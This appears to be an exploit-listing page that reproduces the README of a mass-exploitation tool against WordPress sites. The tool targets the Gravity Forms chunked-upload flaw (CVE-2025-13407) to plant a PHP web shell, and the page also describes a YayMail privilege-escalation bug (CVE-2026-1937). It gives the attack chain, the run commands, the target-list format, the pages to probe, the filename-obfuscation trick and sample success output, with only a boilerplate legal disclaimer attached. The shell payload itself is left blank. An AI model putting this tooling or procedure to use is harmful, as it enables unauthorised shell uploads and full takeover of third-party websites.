Exploit for CVE-2026-1937 CVE-2025-13407 CVE-2026-1937

Name: Exploit for CVE-2026-1937 CVE-2025-13407 CVE-2026-1937
Rating: 5 (95 reviews)
2026-04-18 | CVSS 7.2
## https://sploitus.com/exploit?id=D3A2217C-DCF2-5A65-A0E0-27206B8A2B1D
# CVE-2026-1937
YayMail &lt;= 4.3.2 - Missing Authorization to Authenticated (Shop Manager+) Arbitrary Options Update via 'yaymail_import_state' AJAX Action

  



  
  
  
  
  
  
  


---

## 🔴 Vulnerabilities Overview

---

### ① CVE-2025-13407 — Gravity Forms Unauthenticated Chunked File Upload (RCE)

| Field | Details |
|---|---|
| **CVE ID** | CVE-2025-13407 |
| **Severity** | **CRITICAL** |
| **Affected Software** | Gravity Forms Plugin for WordPress |
| **Vulnerability Type** | Unauthenticated Arbitrary File Upload → Remote Code Execution |
| **Authentication Required** | **None** |
| **Affected Component** | `gf_page=upload` chunked upload endpoint |
| **CWE** | CWE-434: Unrestricted Upload of File with Dangerous Type |

**Description:**  
Gravity Forms exposes a legacy chunked upload endpoint (`?gf_page=upload`) that processes multi-part file uploads for multi-file upload form fields. The endpoint lacks proper server-side file type validation and authentication checks, allowing a remote unauthenticated attacker to upload arbitrary files — including PHP web shells — directly to the server's `wp-content/uploads/gravity_forms/-/tmp/` directory. Successful exploitation results in **Remote Code Execution (RCE)** under the web server process context. The attacker can discover the upload path by brute-forcing or computing the WordPress hash suffix associated with the form ID.

---

### ② CVE-2026-1937 — YayMail WooCommerce Email Customizer Privilege Escalation

| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-1937 |
| **Severity** | **HIGH** |
| **Affected Software** | YayMail – WooCommerce Email Customizer Plugin for WordPress |
| **Affected Versions** | All versions up to and including **4.3.2** |
| **Vulnerability Type** | Missing Capability Check → Unauthorized Option Update → Privilege Escalation |
| **Authentication Required** | Yes — **Shop Manager** level or above |
| **CWE** | CWE-862: Missing Authorization |

**Description:**  
The **YayMail – WooCommerce Email Customizer** plugin for WordPress is vulnerable to **unauthorized modification of data leading to Privilege Escalation** in all versions up to and including **4.3.2**. The `yaymail_import_state` AJAX action handler is registered without any capability check, allowing authenticated attackers with **Shop Manager-level access** or above to invoke it freely. By submitting a crafted AJAX request, the attacker can update arbitrary WordPress site options — including setting the **default user registration role to `administrator`** and **enabling open user registration** — effectively turning the public registration page into an administrator account factory. Any visitor can then register and receive a full WordPress admin account.

---

## 🛠️ Tool Description — CVE-2025-13407

This PoC script performs a **mass exploitation scan** of WordPress sites running vulnerable versions of **Gravity Forms** by:

1. Crawling a list of candidate page paths known to host Gravity Forms
2. Detecting pages containing `.gform_fileupload_multifile` widgets
3. Extracting `form_id`, `field_id`, and `gform_unique_id` from the HTML
4. Uploading a PHP web shell via the two-step chunked upload protocol
5. Reporting the full temp path (if `wp_hash(form_id)` is known) or the raw upload metadata

### 🔗 Attack Chain

```
[Discovery]
  GET //  →  Detect .gform_fileupload_multifile
  Extract: form_id, field_id, gform_unique_id

        ↓

[Chunk 1 Upload]
  POST /?gf_page=upload
  file=nxploited.php  |  chunk=0  |  chunks=2
  → Receive: hash + temp_filename

        ↓

[Chunk 2 Upload]
  POST /?gf_page=upload
  file=image.jpg  |  chunk=1  |  chunks=2
  Pass: hash + temp_filename from Chunk 1
  → Receive: final temp_filename

        ↓

[Result]
  Temp shell path:
  /wp-content/uploads/gravity_forms/-/tmp/

        ↓

[Log to gravity_mass_success.txt]
```

---

## 📋 Requirements

### System Requirements
- Python **3.8** or higher
- Linux / Windows / macOS

### Python Dependencies

```bash
pip install requests urllib3 beautifulsoup4 rich
```

Or via requirements file:

```bash
pip install -r requirements.txt
```

**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
beautifulsoup4>=4.12.0
rich>=13.0.0
```

---

## 🚀 Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2025-13407.git
cd CVE-2025-13407

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2025-13407.py
```

---

## ⚙️ Usage

### Basic Run

```bash
python3 CVE-2025-13407.py
```

The tool uses a fully interactive terminal interface powered by **Rich**.

---

### 🗂️ Target List Format

Create a plain text file (default: `list.txt`) with one target per line:

```
https://target1.com
https://target2.com
http://target3.com
target4.com
```

> Targets without `http://` or `https://` are automatically prefixed with `http://`.

---

### 🖥️ Interactive Prompts

```
Targets file (one host per line) (default: list.txt): list.txt
Threads (default: 5): 10
```

---

### 🔑 Known Hashes — Full URL Resolution

If you know the `wp_hash(form_id)` for a specific form (e.g., via source code access or prior reconnaissance), add it to `KNOWN_HASHES` in the script for full upload URL resolution:

```python
KNOWN_HASHES = {
    "1": "651bc17dc2385aec9f37e1b3c96c0234",
    "3": "a3f2b9c1d7e4f0ab123456789abcdef0",
}
```

| Scenario | Result |
|---|---|
| Hash **known** | Full URL: `https://target.com/wp-content/uploads/gravity_forms/1-651bc.../tmp/nxploited.php` |
| Hash **unknown** | Metadata logged: `target \| page=... \| form_id=... \| temp_filename=...` |

---

## 🔬 Candidate Pages Scanned

The tool automatically probes the following paths on each target (in priority order):

| Category | Paths |
|---|---|
| **Priority** | `/nx_p`, `/nx-p`, `/upload`, `/form`, `/forms`, `/home`, `/contact`, `/contact-us` |
| **Gravity Forms Templates** | `/Gravity-Forms-Upload`, `/Simple-Contact-Form`, `/Advanced-Contact-Form` |
| **WooCommerce Forms** | `/eCommerce-Form`, `/Stripe-Checkout-Form`, `/PayPal-Checkout-Form` |
| **Registration Forms** | `/User-Registration-Form`, `/Event-Registration-Form`, `/Webinar-Registration-Form` |
| **Other Templates** | `/Donation-Form`, `/Survey-Form`, `/Newsletter-Signup-Form`, `/Request-a-Quote-Form` |

---

## 🐚 Uploaded Shell Content

The tool uploads the following static PHP payload:

```php

```

> The file is uploaded as `nxploited.php` via the chunked upload protocol using filename obfuscation (`nxploited.php!`).

---

## 📁 Output Files

| File | Description |
|---|---|
| `gravity_mass_success.txt` | All successful temp upload paths / metadata |

### ✅ Output Format

**With known hash:**
```
https://target.com/wp-content/uploads/gravity_forms/1-651bc17dc2385aec9f37e1b3c96c0234/tmp/nxploited.php
```

**Without known hash:**
```
https://target.com | page=https://target.com/contact | form_id=1 | temp_filename=nxploited.php
```

---

## 🖥️ Terminal Output Sample

```
╔══════════════════════════════════════════════════════════╗
║   CVE-2025-13407  |  Gravity Forms Mass Exploit          ║
║   By: Nxploited   |  GitHub: github.com/Nxploited        ║
╚══════════════════════════════════════════════════════════╝

┌──────────────────────────────────────────────────────────┐
│  Target: https://target.com                              │
│  Pages: 32                                               │
└──────────────────────────────────────────────────────────┘

[VULN]  Multi-file upload at https://target.com/contact
        (form_id=2, field_id=5, gform_unique_id=abc123)

┌─ UPLOAD SUCCESS ─────────────────────────────────────────┐
│  https://target.com/wp-content/uploads/gravity_forms/    │
│  2-/tmp/nxploited.php                           │
└──────────────────────────────────────────────────────────┘
```

---

## 📊 Status Reference

| Message | Meaning |
|---|---|
| `UPLOAD SUCCESS` | 🟢 Both chunks accepted — temp file written to disk |
| `No exploitable multi-file form found` | 🔴 No `.gform_fileupload_multifile` widget detected on any scanned page |
| `First chunk missing fields` | 🟡 Endpoint responded but JSON structure unexpected |
| `Second chunk missing temp_filename` | 🟡 First chunk succeeded but second chunk response malformed |
| `Request error` | ⚫ Network/timeout error on page fetch |

---

## 📡 Contact & Author


  By: Nxploited (Khaled Alenazi)
  
    
  
  &nbsp;
  
    
  


---

## ⚠️ Legal Disclaimer

> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - ✅ **Permitted:** Use on systems you own or have been granted **explicit written permission** to test.
> - ❌ **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole and full responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.

---


  © 2026 Nxploited (Khaled Alenazi) — For authorized security research only.